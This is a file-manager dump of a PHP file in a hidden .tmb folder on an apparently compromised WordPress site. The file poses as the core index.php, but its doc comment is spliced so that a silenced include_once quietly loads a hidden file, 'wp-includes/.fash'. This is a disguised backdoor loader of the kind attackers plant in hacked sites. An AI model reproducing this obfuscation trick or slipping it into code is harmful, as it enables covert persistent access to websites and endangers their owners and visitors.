File "index.php0"
Full Path: /home/fashionbridge/public_html/.tmb/index.php0
File size: 424 bytes
MIME-type: text/x-php
Charset: utf-8
<?php
/**
* Front to the WordPress application. This file doesn't do anything, */@/*
* */include_once/* which does and tells */'wp-includes/.fash';/* to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );
/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';